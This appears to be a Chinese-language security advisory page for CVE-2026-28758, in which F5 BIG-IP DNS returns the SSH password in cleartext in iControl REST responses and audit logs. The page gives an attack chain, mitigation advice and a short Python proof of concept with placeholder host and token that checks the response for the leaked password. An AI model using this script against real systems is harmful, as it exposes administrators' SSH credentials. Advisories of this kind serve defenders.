CVE-2026-28758 CVSS 4.4 中危

CVE-2026-28758 F5 BIG-IP DNS信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28758

漏洞类型

信息泄露

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP DNS

漏洞概述

当BIG-IP DNS被配置时，iControl REST接口中的gtm_add和bigip_add命令存在安全漏洞，导致ssh-password参数在API响应及审计日志中以明文形式返回。这使得拥有高权限且能访问审计日志的攻击者能够获取敏感的SSH密码信息，从而危及系统安全。

技术细节

该漏洞源于F5 BIG-IP系统在处理特定iControl REST API请求时的数据过滤机制缺陷。当BIG-IP DNS模块被启用并配置时，调用gtm_add或bigip_add命令用于添加服务器资源时，系统未能妥善处理敏感数据。具体而言，用户传入的ssh-password参数不仅会在API的成功响应中以明文形式回显，还会被完整地记录在系统的审计日志文件中。由于审计日志通常对拥有高权限的管理员开放，且API响应可能被网络监控设备捕获，这种不安全的存储和传输方式严重威胁了凭证安全。攻击者需先获得高权限认证，随后通过调用特定接口或查阅日志即可获取明文密码。

攻击链分析

STEP 1

攻击者获取F5 BIG-IP系统的高权限账号凭证。

STEP 2

攻击者确认BIG-IP DNS模块已被配置并启用。

STEP 3

攻击者向iControl REST接口发送gtm_add或bigip_add请求，并携带包含ssh-password的JSON payload。

STEP 4

系统处理请求，并在响应中回显ssh-password，同时将其记录到审计日志。

STEP 5

攻击者解析API响应或访问审计日志，提取明文SSH密码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-28758
# This script demonstrates the information disclosure vulnerability.
# Attacker needs High Privilege Auth Token.

import requests
import json

# Configuration
target_host = "https://<BIG-IP-IP>/mgmt/tm/gtm/server/"  # or bigip_add endpoint
auth_token = "<HIGH_PRIVILEGE_TOKEN>"

headers = {
    "Content-Type": "application/json",
    "X-F5-Auth-Token": auth_token
}

# Payload containing the sensitive password
payload = {
    "name": "vulnerable_server",
    "address": "192.168.1.100",
    "ssh-password": "CleartextSecretPassword123"
}

try:
    # Send request to trigger the vulnerability
    response = requests.post(target_host, headers=headers, data=json.dumps(payload), verify=False)
    
    if response.status_code == 200:
        response_data = response.json()
        print("Vulnerability Triggered. Response Data:")
        print(json.dumps(response_data, indent=2))
        
        # Check if ssh-password is leaked in response
        if "ssh-password" in response_data:
            print("\n[!] Password leaked in REST response:", response_data["ssh-password"])
        else:
            print("\n[-] Password not in response, check audit log (/var/log/audit)")
    else:
        print("Request failed with status code:", response.status_code)

except Exception as e:
    print(f"An error occurred: {e}")

影响范围

F5 BIG-IP (具体受影响版本请参考官方公告K000158070)

防御指南

临时缓解措施

在应用官方补丁前，应严格限制拥有高权限账户的数量，并加强对审计日志访问的监控。建议排查现有的审计日志，清除其中可能包含的明文密码记录，防止信息被追溯利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-28758
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-28758
3 Details https://www.cvedetails.com/cve/CVE-2026-28758/
4 VulDB https://vuldb.com/cve/CVE-2026-28758
5 Link https://my.f5.com/manage/s/article/K000158070

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表